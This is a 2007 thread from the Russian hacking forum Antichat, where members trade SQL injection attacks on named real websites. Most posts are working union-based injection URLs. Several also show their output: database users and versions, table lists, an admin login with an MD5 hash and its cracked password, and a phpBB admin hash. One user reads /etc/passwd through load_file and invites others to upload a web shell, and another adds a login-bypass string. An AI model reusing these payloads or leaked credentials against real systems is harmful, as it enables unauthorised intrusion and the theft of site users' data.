Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
09.08.2007, 20:01
|
|
Познающий
Регистрация: 04.05.2007
Сообщений: 38
Провел на форуме:
939769
Репутация:
59
|
|
Код:
http://www.beermat.biz/shop_item.php?id=9999+union+select+1,2,3,concat(database(),0x3a,user(),0x3a,version()),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22/*
beermatadmin:beermatadmin@localhost:5.0.22-Debian_0ubuntu6.06.3-log
Код:
http://www.beermat.biz/shop_item.php?id=9999+union+select+1,2,3,table_name,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22+from+information_schema.tables+limit+16,1/*
Код:
a_member
blog
blog_comment
bm_newsletter
bm_recipients
competition
competition_entry
downloads
event
event_attendee
event_category
member(member_id, email_address, password, title, first_name, last_name, job_title, organisation, web_address, post_code, county, town, region, country, industry, newsletter, event_announcements, accept_terms, allow_3p_contact, blog_alerts, member_type_id, expiry_date, subscription_reference, eu_vat_number, profile_text, image, image_height, image_width, member_status, hash_code, session, ip_address, key_value, new_email, added, updated)
mm_newsletter
mm_recipients
mm_recipients_20070121
mm_recipients_20070319
mm_recipients_20070329
mm_recipients_20070501
mm_recipients_20070529
mm_recipients_kick
mm_recipients_old
newsletter
offers
payment_transactions
private_message
shop_cart
shop_catalogue
shop_category
shop_customer
sys_blog_rejection
sys_country
sys_industry
sys_member_type
sys_parameter
sys_profanity
sys_region
sys_title
twatch_agents
twatch_agentsc
twatch_agentsc_mon
twatch_allreadt
twatch_browsersc
twatch_browsersc_mon
twatch_cousc
twatch_cousc_mon
twatch_errors
twatch_general
twatch_hits
twatch_hits_mon
twatch_hourly
twatch_hourly_mon
twatch_ipcou
twatch_ippages
twatch_ipreadt
twatch_ips
twatch_miles
twatch_monreadt
twatch_pages
twatch_pagesc
twatch_pagesc_mon
twatch_paths
twatch_refdoms
twatch_refgroupsc
twatch_refgroupsc_mon
twatch_refs
twatch_refsc
twatch_refsc_mon
twatch_robotsc
twatch_robotsc_mon
twatch_sessions
twatch_sessions_mon
twatch_weekday_mon
|
|
|
09.08.2007, 22:45
|
|
Участник форума
Регистрация: 12.10.2006
Сообщений: 158
Провел на форуме:
668286
Репутация:
187
|
|
Код:
http://www.studyinuk.ru/news.shtml?id=3502%20union%20select%201,2,AES_DECRYPT(AES_ENCRYPT(concat_ws(0x3b,user(),database(),version(),id,login,pass),0x71),0x71),4,5,6,7,8,9,10%20from%20users/*
|
|
|
|
10.08.2007, 12:17
|
|
Fail
Регистрация: 17.09.2005
Сообщений: 2,242
Провел на форуме:
9089375
Репутация:
4268
|
|
Код:
http://www.mediapool-berlin.de/frameset.php3?Bereich=3&Sprache=d'+and+1=2+union+select+1,2,3,4,version(),6,7,8,9/*
ПР4
Код:
http://auroraforum.stanford.edu/events.php?id=-1+union+select+1,2,3,4,5,6,AES_DECRYPT(AES_ENCRYPT(user(),0x71),0x71),8,9,10,11,12,13,14,15,16/*
Едушка
Код:
http://www.teriin.org/case_inside.php?id=-17087'+union+select+1,version(),3,4,5,6,7,8,9,10,11/*
ПР7
Код:
http://www.eutrainingsite.com/open_details.php?id=-2+union+select+1,table_name,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40+from+information_schema.tables+limit+38,1/*
ПР5
__________________
...
Последний раз редактировалось Alexsize; 10.08.2007 в 13:56..
|
|
|
|
10.08.2007, 15:51
|
|
Познающий
Регистрация: 24.05.2007
Сообщений: 38
Провел на форуме:
114515
Репутация:
29
|
|
http://www.a2k.org.ua/news.php?id=-1+union+select+1,2,3,4,concat(0x12,version(),0x12, user(),0x12),concat(0x21,user,0x21,password),7,8,9 ,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,2 6,27,28,29,30,31,32,33,34,35,36,37,38+from+users/*
version:4.1.22
user:boxnews_a2k@localhost
admin:admin
pass(md5):d23d8b79f575bcc0eedfb8c4e2f13540
pass:repz
Админка на украинском (бля я не фига не понял =) )
http://www.sakhalin.environment.ru/news.php?id=-1+union+select+1,2,concat(0x21,version(),0x21,user (),0x21),4,5+from+news/*
version:4.0.27
user:sakhvatch@localhost
таблицы особо не старалса подбирать (тока news нашел и усе)
http://www.metalistfans.net/news.php?id=-1+union+select+1,2,3,concat(0x21,version(),0x21,us er(),0x21),5,6,7,8,9/*
version:4.0.27-log
user:metalistfans@localhost
Последний раз редактировалось x.Elf; 10.08.2007 в 16:18..
|
|
|
|
10.08.2007, 16:43
|
|
Познающий
Регистрация: 24.05.2007
Сообщений: 38
Провел на форуме:
114515
Репутация:
29
|
|
http://www.dm-centre.ru/inner.php?page=podrazdel&id=-1+union+select+version(),concat(username,0x21,user _password)+from+phpbb_users/*
На форум:
ADMIN
827ccb0eea8a706c4c34a16891f84e7b
|
|
|
|
10.08.2007, 17:42
|
|
Постоянный
Регистрация: 05.07.2006
Сообщений: 458
Провел на форуме:
2943499
Репутация:
807
|
|
Код:
http://www.download.ru/authors/?task=statistik&program=31099+order+by+3--&type=1
юнион не работает, вывести не смог. |
|
|
|
10.08.2007, 20:35
|
|
Постоянный
Регистрация: 21.04.2006
Сообщений: 540
Провел на форуме:
1310036
Репутация:
726
|
|
http://www.filmdeculte.com/news/news.php?id=-3094+union+select+1,2,3,4,5,6,7,8,9,10,11/*
http://www.swisshotel.ru/index.php?d=stadt&id=-1+union+select+1,2,3,4,5,6,7,8,9,password,11,12+fr om+mysql.user/*
|
|
|
|
11.08.2007, 08:31
|
|
Постоянный
Регистрация: 11.03.2007
Сообщений: 581
Провел на форуме:
4172659
Репутация:
646
|
|
http://driver.ru/?file_id=31819+and+ascii(lower(substring(version() ,1,1)))=0x34
MySQL 4.x
|
|
|
|
11.08.2007, 13:55
|
|
Познающий
Регистрация: 05.08.2007
Сообщений: 30
Провел на форуме:
242062
Репутация:
18
|
|
Вот копался по сайтам, жомил на всякую рекламу и наткнулся на слабый по хар-кам, но интересный по скулям сайтец. Нашел несколько штук, воспользуюсь только одной
http://mgrant.ru/safe_gl.php?safeid=-1+union+select+1,2,3,4,5,6,7,8,9,10/*
Ну вроде бы обычная скуля, ничего примечательного, однако:
Кавычки не фильтруются
есть file priv...
есть доступ к mysql.user
http://mgrant.ru/safe_gl.php?safeid=-1+union+select+1,2,user,password,load_file('/etc/passwd'),6,7,8,9,10+from+mysql.user+limit+0,1/*
Кто зальет шелл стукните в личку/аську, я чего-то там недогнал немнога, юзеры все лежат в /etc/passwd, в httpd только путь.
Удачи =)
PS: версия четвертая, таблы не просмотреть, я там нашел парочку, уже не помню названия, логины и пароли ни к чему не подходят. |
|
|
|
11.08.2007, 17:21
|
|
Познающий
Регистрация: 24.05.2007
Сообщений: 38
Провел на форуме:
114515
Репутация:
29
|
|
Сообщение от sharoff
Вот копался по сайтам, жомил на всякую рекламу и наткнулся на слабый по хар-кам, но интересный по скулям сайтец. Нашел несколько штук, воспользуюсь только одной
Ну вроде бы обычная скуля, ничего примечательного, однако:
Кавычки не фильтруются
есть file priv...
есть доступ к mysql.user
Кто зальет шелл стукните в личку/аську, я чего-то там недогнал немнога, юзеры все лежат в /etc/passwd, в httpd только путь.
Удачи =)
PS: версия четвертая, таблы не просмотреть, я там нашел парочку, уже не помню названия, логины и пароли ни к чему не подходят.
Там еще Post Sql inj:
вход:
1' or 1=1/*
в админке авторизация базик
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
